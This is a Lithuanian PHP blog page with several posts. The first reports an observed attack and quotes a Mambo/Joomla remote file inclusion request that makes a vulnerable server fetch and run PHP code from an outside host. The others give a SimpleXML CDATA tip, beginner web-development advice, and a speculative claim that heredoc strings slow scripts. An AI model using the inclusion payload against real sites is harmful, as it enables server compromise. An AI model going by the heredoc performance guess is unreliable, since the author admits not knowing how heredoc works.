Kartas nuo karto nueinu pasižiūrėti, kas šiuo metu naršo mano bloge. Pasižiūriu iš kur atėjo, kokį puslapį žiūri. Įdomu, kai viskas vyksta „on the fly“.

Dabar ką tik prisijungęs pamačiau, kad žmogus/robotas iš šio IP 72.55.143.52 bando laužtis į šį puslapį. Grečiausiai tai daro koks nors script kiddie, nes įvedus šį IP į google, paieškos rezultatuose išmetami access logai su panašiomis atakomis.

Kaip vykdoma ataka.

Į nuorodą yra įvedama štai tokia eilutė

http://www.sadauskas.lt/index.php/category/kompiuterija/programavimas/php/
index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&
_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=
http://www.pooya.info/images/…/test.txt%3

Iš kintamųjų bandomų perduoti per užklausą spėju, kad bandoma įsibrauti panaudojant kažkokį Mambo/Joomla TVS’o pažeidžiamumą arba tiesiog išnaudoti register_globals on parametrą, jeigu serverio administratorius nekoks specialistas ir palieką jį įjungtą.

Jeigu aš naudočiau Joomla TVS ir serverio parametruose būtų register globals on, tai puslapis įvykdytų PHP kodą, kuris pateiktas šioje nuorodoje http://www.pooya.info/images/…/test.txt

Na, o jeigu jau puslapis jį įvykdytų ir serveris būtų netvarkingai sukonfigūruotas, tai viso gero jūsų duomenims, o gal ir visam serveriui.

Tokių kiber atakų turbūt patiriame kiekvienas, tik dažniausiai jų nepastebime. Būkit atsargūs.

Pamačiau šį mielą drambliuką ir nesusilaikiau papost’int Žilvinui

Linkiu ir toliau šiltų ir draugiškų santykių su drambliuku kurs tave maitina

Daugiau apie drambliuką ir jo pomėgius čia

Posted by: FaVoRiT | Dedicated to: Žilvinas ir visiem prijaučiantiem

Turbūt daugeliui programuotojų, kurie yra kažką rimtesnio veikę su XML iškilo problema parsinant CDATA tagą su simplexml. Problema yra tokia, kad SimpleXML tiesiog nerodo informacijos, esančios CDATA viduje. Gerai pasiknisus dokumentacijoj aptikau vieną labai gerą konstanta kurią reikia pateikti funkcijai simplexml_load_string(). Ta konstanta yra LIBXML_NOCDATA.

Bendras funkcijos kvietimas turėtų atrodyti taip:
simplexml_load_string($xmlStringas, ‘SimpleXMLElement’, LIBXML_NOCDATA);

Bėda (man tai visai ne ) yra tame, kad šis daiktas veikia tik PHP >= 5.1

Iš vieno pažįstamo gavau tokį laišką

Klausyk, norejau paklaust, kokio softo man reik ant kompo, kad vasara galeciau pasimokyt ten ta php, html , ir dar kokia ten velniava su web proginimu, galima sakyt ash ne zalias o ishvis baltas siame dalyke ;]. Ash pora knygu sau nukopinau ant kompo, bet ner dar laiko jas pavartyti, tiesiog kokio reik softo, kad galeciau ir progint ir pamatyt rezultata, tai va dar gal pvz koki turi uzsakymo?: tipo reik ten koki saita padaryt kokiai firmai, ir kokia ishvis jie tau informacija paduoda, ar reikalavimus? Blin jei atrashysi kad uztenka Wordpad tai bus zinok gan juokinga, gal yra kokie redaktoriai kaip pas java ash naudoju eclipse…

Krc minti turbut supratai, kur nesuprasi, kai tiek prispaminau ;]

Dekoju uz (tikiuosi bent kokionors) patarima ;] ir susitiksim egze ketvirtadieni

Ir daviau jam štai tokį patarimą.

Sveikas,

Del php programavimo, tai pirmiausiai tau reikia susiinstalint PHP + Apache + MySQL
php.net
apache.org
mysql.com
Dar yra toks dalykas kaip LAMP ir WAMP. LinuxApacheMysqlPhp ir WindowsApacheMysqlPhp. Cia paprastesniam PHP, MySQL ir Apache idiegimui, nes kartais tai gali buti skausmas subineje.

Del firmu tai nieko jos neduoda, jos pasako man reikia to to to ir ano ir viskas. o tas tas ir anas yra katalogo, puslapiu, naujienu ir dar ko nors. tada jau eigoje koreguojasi viskas. Geri IDE yra Zend‘o (zend.com) ir nusphere PHPEd, taciau as pripazystu paprasta editoriu Editplus, kadangi jis paprastas ir greitas .

Dar yra tokie dalykai, kuriuos turi zinoti kiekvienas save gerbiantis php programuotojas, tai savokos: framework, CMS, template engine. Cia minimum. Viska gali rasti wikipedioj. PHP programeriui nebutina moketi HTML, taciau tai yra didelis privalumas, todel pasiskaitinek ir apie HTML bei CSS.

Siaip pradziai gali paanalizuoti kitu koda, ir taip pramoksi webo technologiju. Yra pasaulyje zinomi opensource’iniai cms’ai/frameworkai joomla, mambo, cakephp ir pan. Su jais pakurti weba yra juoku darbas, tik uzsakova rask. Dar yra oscommerce.com, kurie duoda nachaliu cms’a tik reikia idiegti ir pakoreguoti pagal klienta, tai pasiimi ir stumdai . Kai jau busi truputi pazenges galesi bandyti pasirasyti savo CMS’a, kuris tenkintu tavo specifinius norus ir idejas.

Tai tiek kol kas.

Manau, tai visai vertinga informacija begineriams, todėl ir papostinau čia šitą laišką

Beprogramuodamas pastebėjau, kad PHP operatorius <<<PARAM [...] PARAM; labai sulėtina scenarijaus vykdymo laiką. <<<PARAM [...] PARAM; yra tas pats kas “EILUTĖ”. Abiejų tekstai, esantys viduje, yra interpretuojami. Tiksliai nežinau kaip veikia <<<PARAM [...] PARAM; bet manau, kad čia yra kuriamas srautas, kurio kūrimas yra daug lėtesnis, negu paprastos eilutės kūrimas.

Struktūrą <<<PARAM [...] PARAM; naudoju retai, tik rašydamas SQL sakinius, dėl paprastumo. Tačiau po šiandienos testavimo tikrai nepatingėsiu dėlioti ‘ ir ‘ eilutės pradžioj ir pabaigoj, bei išskiriant PHP kintamuosius, kadangi vykdymo laikas keleta kartų sutrumpėja, nes PHP eilutės, esančios apostrofų viduje, neinterpretuoja.